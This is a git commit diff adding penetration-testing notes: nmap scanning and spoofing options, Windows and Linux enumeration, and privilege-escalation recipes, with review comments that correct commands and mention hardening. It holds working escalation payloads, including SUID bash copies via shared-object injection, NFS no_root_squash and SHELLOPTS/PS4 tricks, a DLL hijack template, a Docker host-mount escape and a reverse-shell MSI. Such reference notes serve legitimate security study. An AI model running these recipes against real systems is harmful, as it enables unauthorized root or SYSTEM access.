This commit is contained in:
Stefan Etringer 2021-10-23 02:03:06 +02:00
parent b35bcc5560
commit 016773b802
27 changed files with 4487 additions and 8 deletions

.gitmodules vendored
@ -40,3 +40,12 @@
[submodule "enumeration/RustScan"]
path = enumeration/RustScan
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration"]
path = post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
url =
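Review bot: the three `url =` lines in this hunk are blank as rendered, so `git submodule update --init` would have nothing to fetch for linux-exploit-suggester, linux-smart-enumeration and linuxprivchecker; confirm the raw `.gitmodules` carries the upstream URL for each (the RustScan entry in the context shows the same blank value, so this may be a rendering artifact rather than a real omission). Since these are third-party privilege-escalation scripts vendored as submodules, the pinned `Subproject commit` revisions further down in this commit are what actually gets executed; review those revisions against upstream before running them on any host.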

@ -1,6 +1,20 @@
# nmap
# Usage
## Scan Types
## Port States
1. Open
2. Closed
3. Filtered
4. Unfiltered
5. Open|Filtered
6. Close|Filtered
## Usage
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
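Review bot: `6. Close|Filtered` should read `Closed|Filtered`, matching nmap's own state name. The top-level `# Usage` heading duplicates the `## Usage` below it, and `## Scan Types` is added with no body; either move the TCP scan type bullets that appear later in this file under it or drop the heading.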
@ -9,13 +23,105 @@ nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
## combo with searchsploit
### combo with searchsploit
* nmap-full scan
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose
## Wordpress Enumeration
### Wordpress Enumeration
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80
### Use List of Hosts
nmap -iL <ListofHosts>
* Show hosts, dns resolution included
nmap -sL -n
### ARP Scan Local Network
nmap -PR -sn
### ICMP Scans
* __Type 8__ (Ping Request)
nmap -PE -sn
* __Type 13__ (Timestamp Request)
nmap -PP -sn
* __Type 17__ (Address Mask Queries)
nmap -PM -sn
### TCP Scans
* `-PS23` Syn on port 23
* `-PA80-8080` ACK on port range 80-8080
#### TCP Scan Types
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
* __FIN Scan__ `-sF` , same procedure as null scan.
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
### UDP SCans
* `-PU`
* May be answered by ICMP Type 3 if the port is not reachable
### DNS Scan
* No lookup `-n`
* Reverse lookup for every host `-R`
* Host discovery only `-sn`
### Spoofing
* IP `-S <spoofed-IP>`
* MAC `--spoof-mac <spoofed-MAC>`
* Disable ping scan `-Pn`
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
### Service Detection
* `-sV`
* `--version-intensity <level 0-9>`
* Intensity 2 `--version-light`
* Intensity 9 `--version-all`
## Scripts
Installed at `/usr/share/nmap/scripts`
* __auth__ Authentication related scripts
* __broadcast__ Discover hosts by sending broadcast messages
* __brute__ Performs brute-force password auditing against logins
* __default__ Default scripts, same as -sC
* __discovery__ Retrieve accessible information, such as database tables and DNS names
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
* __exploit__ Attempts to exploit various vulnerable services
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
* __fuzzer__ Launch fuzzing attacks
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
* __malware__ Scans for backdoors
* __safe__ Safe scripts that wont crash the target
* __version__ Retrieve service versions
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
## Tips & Tricks
* Scan the 100 most interesting ports via `-F`
* `--top-ports 100`
* One probe every 5 minutes via `-T0`
* A closed port responds with `RST/ACK` to a initial `SYN`
* Scan ports iteratively by using `-r`, not random
* Closed Port
* Control packet rate via `--min-rate` and `--max-rate`
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
* `--reason`, `-d`, `-vv`
* `--traceroute`
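Review bot: several commands in this hunk will not run as written: `-script vuln` needs two dashes (`--script vuln`); `sudo nmap -oA --nmap-full ...` passes `--nmap-full` as the output basename, which does not match the `./nmap-full.xml` handed to `searchsploit --nmap` on the next line (use `-oA nmap-full`); and `--scripts-args` should be `--script-args`. On the descriptions: for Null, FIN and Xmas scans nmap reports a silent port as `open|filtered`, not `open`, because a filtering device also produces no response; `-F` scans the 100 most common ports and is therefore the same as `--top-ports 100`, so those two bullets can be merged; and `--scanflags RSTACKFIN` sets exactly the named flags, it does not set them randomly. Minor: `## combo with searchsploit` and `## Wordpress Enumeration` are each immediately repeated as a `###` heading, `### UDP SCans`, `__dos Detects__` (the bold spans the wrong word), `wont`, `a initial`, and the dangling `* Closed Port` bullet under Tips & Tricks.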

@ -63,7 +63,7 @@ Get-ChildItem | Sort-Object
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr <searchstring>
Get-HotFix | Format-list | findstr <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
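Review bot: `Get-HotFix | Format-list | findstr <searchstring>` appears twice in this hunk; keep one copy, and use the canonical cmdlet casing `Format-List` while at it.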
@ -160,6 +160,10 @@ Get-WmiObject win32_useraccount | Select name, sid
### Network intel
* Connections
netstat -ano
* IP Address
@ -183,7 +187,14 @@ Get-Hotfix
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn
### Drivers
### Processes
* Start processes
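Review bot: `KB124284` in the `Where-Object -Property HotFixID -Match` line reads like a value left over from a specific host; use the `<...>` placeholder style the other commands in this file use (for example `<KBnumber>`). `### Drivers` is added as an empty heading with nothing under it.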
@ -195,6 +206,10 @@ Start-Process <process>
Get-Process <process>
### Scheduled tasks
schtasks /query /fo LIST /v
* Scheduled Tasks, by TaskName
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
@ -236,6 +251,15 @@ for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
### Antivirus
sc query windefend
* Service name unknown
sc queryex type=service
### Using Powerview
Import-Module .\powerview.ps1
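Review bot: the ping sweep is inconsistent with its own echo: `ping -n 1 10.0.2$_` is missing the dot before `$_` (the echo uses `10.0.2.$_`), so it would ping `10.0.21`, `10.0.22` and so on. Also `sc queryex type=service` needs the space that sc.exe requires after the `=` (`type= service`); without it sc prints its usage text instead of the service list.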

@ -0,0 +1,21 @@
* Preload libs and do interpositioning of functions.
## Example
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
* `gcc -fPIC -shared -o lib.c -nostartfiles`
* `sudo apache2`
* `$ id`
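Review bot: the compile line `gcc -fPIC -shared -o lib.c -nostartfiles` names the C source as the output file and gives no input at all; it needs the form `gcc -fPIC -shared -o lib.so lib.c -nostartfiles`. As rendered, the `_init()` body and the `sudo` invocation are cut off, so the page never shows how the library is actually loaded. The doc should also state the precondition the whole technique depends on: `sudo -l` has to show `env_keep+=LD_PRELOAD`, otherwise sudo strips the variable before executing the command; that sudoers entry is also the line to remove when hardening a host.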

@ -0,0 +1,21 @@
# NFS RootSquash
* [hacktricks](
* `no_root_squash` has to be as an option on the NFS device
## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`
* Connect to NFS share
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
* Create root shell inside the dir of the share
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell
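Review bot: `no_root_squash` is an export option set per share in `/etc/exports` on the NFS server, not an option "on the NFS device"; `root_squash` is the default, so this only applies to exports that explicitly disable it. `showmount -e` lists exported paths but not their options, so the Usage list should say where the option is actually visible (`cat /etc/exports` on the server). Also `shell.c` calls `setuid`, `setgid` and `system` without `#include <unistd.h>` and `#include <stdlib.h>`; recent gcc versions treat those implicit declarations as errors, so the one-liner as written no longer compiles cleanly.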

@ -0,0 +1,24 @@
# Shared Object Injection
* [gaffe23](
* [exploit-db](
* Test binary via
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
## Example
#include <stdio.h>
#include <stdlib.h>
static void inject ( ) __attribute__ ( (constructor) );
void inject ( ) {
system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
* `gcc -fPIC -shared -o ~/.config/ ~/.config/lib.c`
* Run binary using the lib
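Review bot: `gcc -fPIC -shared -o ~/.config/ ~/.config/lib.c` gives `-o` a directory, so gcc refuses to write the output; the path is truncated here and the doc should name it explicitly, since it has to be the exact library path that the `strace ... | grep -i -E "open|access|no such file"` line reports as missing. That same strace line is also the audit check: a SUID binary probing for a library under a user-writable directory is the misconfiguration to fix (correct the library search path or the directory permissions), which is worth saying alongside the example.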

@ -0,0 +1,42 @@
# DLL Hijacking
## Search Orders
* __SafeDllSearchMode__ enabled searches paths in following order:
* __cwd__ of executable
* System directory, `GetSystemDirectory`
* 16-bit system directory
* Windows, `GetWindowsDirectory`
* __pwd__
* __SafeDllSearchMode__ disabled searches in following order:
* __cwd__ of executable
* __pwd__
* System directory
* 16-bit system directory
* Windows directory
* PATH environment variable
## Template
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
return TRUE;
* Compilation via
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
* Upload to target
* Restart dllsvervice via
sc stop dllsvc
sc start dllsvc
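Review bot: the SafeDllSearchMode-enabled list is incomplete and its terms are confusing: the PATH directories, searched after the current directory, are missing from the first list (they appear only in the disabled list), and `cwd of executable` / `pwd` should be named as Microsoft does, the application's directory and the current directory, since `cwd` normally means the latter. SafeDllSearchMode has been enabled by default since Windows XP SP2, so the second list only applies where it was switched off via `HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode` = 0, which the doc should state. As rendered, the `DllMain` template is missing the closing braces for the `if` block and the function and lacks `#include <stdlib.h>` for `system()`, and `dllsvervice` should read `dllsvc service` to match the two `sc` commands.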

@ -0,0 +1,14 @@
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
return TRUE;
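Review bot: this file duplicates the `## Template` block of the DLL hijacking doc added in the same commit; keep one copy and link the doc to this file so the two do not drift. As rendered it is missing the closing braces for the `if` block and for `DllMain`, and `system()` needs `#include <stdlib.h>`; confirm it builds with the mingw line given in its own header comment.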

Binary file not shown.

@ -11,7 +11,14 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Po
* start the msi on target
msiexec /quiet /qn /i C:\shell.msi
msiexec /quiet /qn /i C:\Temp\shell.msi
## Set Registry Keys
* Alternative method
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
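Review bot: the two `msiexec` lines look like the before and after of a single edit (`C:\shell.msi` to `C:\Temp\shell.msi`) rather than two alternatives; if both are meant to stay, label them. The `## Set Registry Keys` heading does not match its content, which only queries; for the `Always install elevated` condition this doc is about, the `reg query` lines should name the value (`/v AlwaysInstallElevated`), and the text should say it must be 1 in both the HKCU and HKLM hives for the technique to apply, which is also why setting either one to 0 is enough to close it.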

@ -1,7 +1,10 @@
# Unquoted Path
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
* Some part of path has to be writeable.
* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
## Example
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
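Review bot: the explanation `windows tries to insert .exe instead of a space` is imprecise: the service control manager tries each space-delimited prefix of the unquoted path as an executable in turn (`C:\Program.exe`, then `C:\Program Files\Unquoted.exe`, and so on for the example path below), so the first writable prefix wins; the fix is to quote the service's `ImagePath`. Also `unqoted` should be `unquoted`, and if both `writeable` bullets are meant to remain rather than being a removed/added pair, merge them into one.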

@ -50,10 +50,18 @@ find / -name "*sock"
* Mount the host volume and chroot to it, need alpine image
* Mount the host volume and chroot to it, need alpine image.
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces
* Namespaces
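Review bot: the two `docker run` lines do the same thing with different images and mount points (`/mnt` vs `/host`); keep one and parameterise the image, since `docker images` on the line above is there to pick it. More importantly the doc should state the precondition: this requires the ability to talk to the Docker daemon (docker group membership or a writable daemon socket, which the `find / -name "*sock"` context line is looking for), and that such access is root-equivalent, which is the finding to raise in a hardening report.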

@ -0,0 +1,37 @@
# Linux enumeration
* `cat /etc/*-release` * `cat /proc/version`
* `hostname`
* `uname -a`
* `cat /etc/issue`
* `ps wuax ` or `ps ajxf` or `ps -A`
* `printenv` or `env`
* `sudo -l`
* `id`
* `whoami`
* `groups` and `getent group`
* `cat /etc/passwd`
* `history`
* `ip` or `ifconfig`
* `ip route`
* `netstat -natup` or `ss natup`
* `netstat -s` and `netstat -i`
* `lsof -i`
* Find SUID permissions on files and dirs
* `find / -perm /6000 -ls 2>/dev/null`
* Find writeables dirs
* `find / -writable -type d 2>/dev/null` or `find / -perm -o w -type d 2>/dev/null`
* `find / -perm -o x -type d 2>/dev/null`
* Find writeable subdirs
`find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`
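Review bot: `find / -perm -o w -type d` and `find / -perm -o x -type d` will not run: `-perm` needs a symbolic mode with an operator, so `-perm -o=w` and `-perm -o=x` (GNU find rejects `-o` alone as an invalid mode). Also `ss natup` is missing its dash (`ss -natup`); `-perm /6000` matches SUID or SGID, so the heading should say SUID/SGID; the first bullet holds two commands on one line; `writeables dirs` should be `writable dirs`; and the final `cut -d "/" -f 2,3` command is the only one in the file without the bullet formatting the others use.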

@ -0,0 +1,6 @@
# Man In the Middle
* [Ettercap](
* [Bettercap](

@ -5,4 +5,72 @@
* [LinEnum](
* [Smart Enumeration](
* [Linux Exploit Suggester](
* [GTFObins](
* [GTFObins](
* [Linpeas](
## Kernel Exploits
### Dirty COW
* [CVE-2016-5195](
* [c0w.c](../kernel-exploits/dirtycow)
## Stored Keys & Passwords
* History
* Environment Variables
* Config + Dot Files
* SSH keys
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
* list
find / -perm /6000 -ls 2>dev/null
* [Shared object injection](../../../exploit/linux/
* [CVE-2016-1247](
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/
* [CVE-2019-14287](../../../exploit/linux/sudo/
* [CVE-2019-18634](../../../exploit/linux/sudo/
* [LD_PRELOAD](../../../exploit/linux/
* `sudo -l`
* Take a look at GTFObins
* Keep an eye on the displayed host and env capabilities
## PATH Hijacking
* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interposition name and add the directory in front of `$PATH`
## Bash function
* Interpositioning of binaries via bash functions
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /path/to/binary
* Call binary which invokes this function
## Environment Variable
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
## Capabilities
* [capabilities](../../../exploit/linux/
## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/
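Review bot: two commands have typos that break them: `unshadow /etc/passd /etc/shadow` should be `/etc/passwd`, and `find / -perm /6000 -ls 2>dev/null` is missing the slash in `2>/dev/null`. The GTFObins link is listed twice. Both shell tricks in this hunk should carry the bash version they apply to, since that is what decides whether a host is exposed: exporting a function whose name is an absolute path (`export -f /path/to/binary`) only shadows the real binary on bash before 4.2-048, and the `SHELLOPTS=xtrace` / `PS4` trick stops working on bash 4.4 and later, which no longer imports those variables when the effective uid differs from the real uid.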

@ -4,3 +4,74 @@
* [Fundamentals](
* [PowerShellEmpire](
* [JAWS](
## Account Types
* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__
## Enumeration
### Users & Groups
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
### Files
* [powershell](../../../../enumeration/windows/
### System
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
* Installed software
wmic product get name,version,vendor
* Services
wmic service list brief | findstr "Running"
## Exploit
### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/
### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/
### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/
### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`
### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/
### Search for Credentials
cmdkey /list
* Use found credentials
runas /savecred /user:<user> reverse_shell.exe
* Keys containing passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
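Review bot: `whoami priv` under Token Impersonation is missing the slash (`whoami /priv`, as in the Users & Groups block above). The Hot Potato line mixes up variants: the Server 2019 / Windows 10 1809 cutoff is the one for Rotten and Juicy Potato (the DCOM-based variants), while the original Hot Potato was addressed by MS16-075 back in 2016, so the doc should say which variant the threshold refers to. Also `### Schedules Tasks` should be `Scheduled Tasks`, and since `SeImpersonatePrivilege` is granted to service accounts such as IIS application pools by default, it is worth noting that the hardening answer is to run those services as the least privileged account available rather than to expect the privilege itself to be removable.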

Binary file not shown.

File diff suppressed because one or more lines are too long

Binary file not shown.

@ -0,0 +1 @@
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470

@ -0,0 +1 @@
Subproject commit 950268573fbb4389fc4cf56b8d75bfb826564e1d

@ -0,0 +1 @@
Subproject commit ebf996195c767a9f2008a6ba97abefd2e558de82

@ -19,6 +19,11 @@ php -e 'exec "/bin/bash";'
python -c 'import pty; pty.spawn("/bin/bash")'
### Perl
perl -e 'exec "/bin/sh";'
## Next
1. `ctrl` + `z`
2. `stty echo -raw`
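Review bot: step 2 `stty echo -raw` is the restore command (it turns echo back on and leaves raw mode); the upgrade step that follows `ctrl+z` is `stty raw -echo; fg`, with `stty echo -raw` (or `reset`) run once the session is finished. The hunk is truncated here, so check that the remaining steps are in that order. In the context line, `php -e 'exec "/bin/bash";'` should use `php -r`; `-e` is not the run-code flag of the PHP CLI.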